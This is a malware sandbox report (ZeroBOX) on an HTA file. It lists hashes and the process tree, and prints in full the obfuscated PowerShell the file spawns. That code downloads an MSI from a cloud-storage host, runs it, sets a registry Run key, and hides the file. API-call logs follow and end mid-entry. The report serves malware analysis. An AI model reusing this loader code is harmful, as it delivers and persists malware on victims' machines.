Summary | ZeroBOX

es.hta

Generic Malware Antivirus PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 24, 2024, 7:18 p.m. Nov. 24, 2024, 7:21 p.m.
Size 21.6KB
Type HTML document, ASCII text, with very long lines
MD5 10184fe59d8f1d9d1f50d9e373f1c007
SHA256 8bf7d79425114140c858c24114586ac08a9688e4f23b32e95533c97c89b99643
CRC32 2C1EDD57
ssdeep 384:CcxhZ9NREaeBiDepANfCTN8WQ+t6pZRXhQZzWC:NZ9NREae9ANfCTN8WQ+kpZ5hUzZ
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\es.hta

    1460
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $AgMxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,4306,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,4249,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP @(4270,4273,4267,4287,4293,4265,4283,4280,4280,4267,4276,4282,4293,4283,4281,4267,4280,4290,4281,4309,4300,4314,4317,4295,4312,4299,4290,4275,4303,4297,4312,4309,4313,4309,4300,4314,4290,4285,4303,4308,4298,4309,4317,4313,4290,4265,4315,4312,4312,4299,4308,4314,4284,4299,4312,4313,4303,4309,4308,4290,4280,4315,4308)), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH.Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};function CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUkG=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)};return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQtta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,4253,4298,4249,4255,4254,4252,4252,4251,4254,4295,4300,4250,4251,4247,4297,4255,4298,4251,4248,4296,4296,4255,4300,4250,4254,4248,4296,4249,4299,4248,4298,4244,4312,4248,4244,4298,4299,4316,4245,4277,4276,4270,4279,4276,4270,4268,4282,4244,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PNjTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;;}paTeG;

      2092

IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:1096
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $Ag
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: MxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,43
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 06,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,42
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: 49,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: )), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: 4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: .Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};func
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: tion CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]:: <<<< Sec
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: urityProtocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: ($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUk
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: G=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)}
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: ;return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQt
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: ta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: 44,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PN
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: jTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: ;}paTeG;
console_handle: 0x0000017f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000018b
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000197
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: ot be resolved: 'pub-37d3986658af451c9d52bb9f482b3e2d.r2.dev'"
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: At line:1 char:1178
console_handle: 0x000001cf
1 1 0

WriteConsoleW

buffer: + function oGEDCAcL($FlnMpBxK, $AgMxaC){[IO.File]::WriteAllBytes($FlnMpBxK, $Ag
console_handle: 0x000001db
1 1 0

WriteConsoleW

buffer: MxaC)};function PNjTla($FlnMpBxK){if($FlnMpBxK.EndsWith((bShFjqP @(4244,4298,43
console_handle: 0x000001e7
1 1 0

WriteConsoleW

buffer: 06,4306))) -eq $True){Start-Process (bShFjqP @(4312,4315,4308,4298,4306,4306,42
console_handle: 0x000001f3
1 1 0

WriteConsoleW

buffer: 49,4248,4244,4299,4318,4299)) $FlnMpBxK}else{Start-Process $FlnMpBxK}};function
console_handle: 0x000001ff
1 1 0

WriteConsoleW

buffer: jSNvCEiiX($FlnMpBxK, $VQwqYETV){[Microsoft.Win32.Registry]::SetValue((bShFjqP
console_handle: 0x0000020b
1 1 0

WriteConsoleW

buffer: )), $VQwqYETV, $FlnMpBxK)};function FvPeqUFa($FlnMpBxK){$icpWe=(bShFjqP @(4270,
console_handle: 0x00000247
1 1 0

WriteConsoleW

buffer: 4303,4298,4298,4299,4308));$YwLPNbBH=(Get-ChildItem $FlnMpBxK -Force);$YwLPNbBH
console_handle: 0x00000253
1 1 0

WriteConsoleW

buffer: .Attributes=$YwLPNbBH.Attributes -bor ([IO.FileAttributes]$icpWe).value__};func
console_handle: 0x0000025f
1 1 0

WriteConsoleW

buffer: tion CBgQtta($kpSwxupu){$MSwCV = New-Object (bShFjqP @(4276,4299,4314,4244,4285
console_handle: 0x0000026b
1 1 0

WriteConsoleW

buffer: ,4299,4296,4265,4306,4303,4299,4308,4314));[Net.ServicePointManager]::SecurityP
console_handle: 0x00000277
1 1 0

WriteConsoleW

buffer: rotocol = [Net.SecurityProtocolType]::TLS12;$AgMxaC = $MSwCV.DownloadData <<<<
console_handle: 0x00000283
1 1 0

WriteConsoleW

buffer: ($kpSwxupu);return $AgMxaC};function bShFjqP($sCjSPqnz){$pPsWrYNz=4198;$eqBSpUk
console_handle: 0x0000028f
1 1 0

WriteConsoleW

buffer: G=$Null;foreach($kPMiigIX in $sCjSPqnz){$eqBSpUkG+=[char]($kPMiigIX-$pPsWrYNz)}
console_handle: 0x0000029b
1 1 0

WriteConsoleW

buffer: ;return $eqBSpUkG};function paTeG(){$HDgYp = $env:APPDATA + '\';$YScpLG = CBgQt
console_handle: 0x000002a7
1 1 0

WriteConsoleW

buffer: ta (bShFjqP @(4302,4314,4314,4310,4313,4256,4245,4245,4310,4315,4296,4243,4249,
console_handle: 0x000002b3
1 1 0

WriteConsoleW

buffer: 44,4307,4313,4303));$iEiUK = $HDgYp + 'ONHQNHFT.msi';oGEDCAcL $iEiUK $YScpLG;PN
console_handle: 0x000002e3
1 1 0

WriteConsoleW

buffer: jTla $iEiUK;$VQwqYETV = 'iJOtPBQ';jSNvCEiiX $iEiUK $VQwqYETV;FvPeqUFa $iEiUK;;;
console_handle: 0x000002ef
1 1 0

WriteConsoleW

buffer: ;}paTeG;
console_handle: 0x000002fb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x00000307
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000313
1 1 0

WriteConsoleW

buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null.
console_handle: 0x0000001b
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x00000027
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f9b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022f2f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022faf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fd78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00230078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fe38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022feb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0022fdb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02870000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2092
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x719b2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02492000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02871000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02872000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024ca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0249b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024cc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02710000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024c9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2092
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027f7000
allocation_type: 4096 (MEM_COMMIT)
